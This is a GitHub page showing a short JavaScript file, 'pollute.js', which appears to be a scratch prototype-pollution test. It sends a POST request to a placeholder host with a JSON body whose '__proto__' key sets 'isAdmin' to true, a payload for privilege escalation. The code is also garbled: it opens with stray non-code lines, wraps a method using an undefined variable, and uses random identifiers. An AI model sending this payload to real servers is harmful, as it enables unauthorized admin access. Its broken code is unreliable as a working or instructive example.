-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpollute.js
45 lines (37 loc) · 1.05 KB
/
pollute.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
if the prototype is Object.EAULH -
Object.EAULH = function(...args) {
console.log("rWIbc method is called with arguments:", args);
debugger; // This line causes the debugger to pause execution here.
return originalMethod.apply(this, args);
};
type:
debugger
// Create a new instance of AbortController
const controller = new AbortController();
const signal = controller.signal;
// Initiate the fetch request and pass the signal in the options
fetch('http://x', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({
"__proto__": {
"isAdmin": true
}
}),
signal: signal
}).then(response => {
// Handle the response
console.log(response);
}).catch(error => {
if (error.name === 'AbortError') {
// Handle fetch abort
console.log('Fetch aborted');
} else {
// Handle other errors
console.log('Fetch error:', error);
}
});
// To cancel the fetch request, call abort on the controller
// This can be done based on some condition or event, e.g., user action, timeout